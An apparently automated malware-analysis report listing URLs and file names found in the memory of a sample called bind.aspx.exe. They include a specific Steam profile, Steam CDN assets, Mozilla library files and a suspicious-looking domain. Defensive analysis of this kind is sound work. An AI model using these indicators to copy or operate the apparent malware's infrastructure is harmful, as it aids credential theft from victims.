                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.dr | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                    Source: bind.aspx.exe, 00000004.00000002.1880614542.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, FBFIJJ.4.dr | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: BKKFHI.4.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: BKKFHI.4.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: BKKFHI.4.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://help.steampowered.com/en/
                    Source: FBFIJJ.4.dr | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                    Source: bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
                    Source: bind.aspx.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr | String found in binary or memory: https://mozilla.org0/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
                    Source: bind.aspx.exe, 00000004.00000003.1628710997.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/discussions/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199761128941
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/market/
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: bind.aspx.exe | String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
                    Source: bind.aspx.exe, 00000004.00000003.1695841071.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1681189764.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1619104018.000000000357A000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1651747381.000000000357D000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1666363405.0000000003581000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880614542.000000000357C000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000003.1628710997.00000000035BF000.00000004.00000020.00020000.00000000.sdmp, bind.aspx.exe, 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp, 76561199761128941[1].htm.4.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941/badges
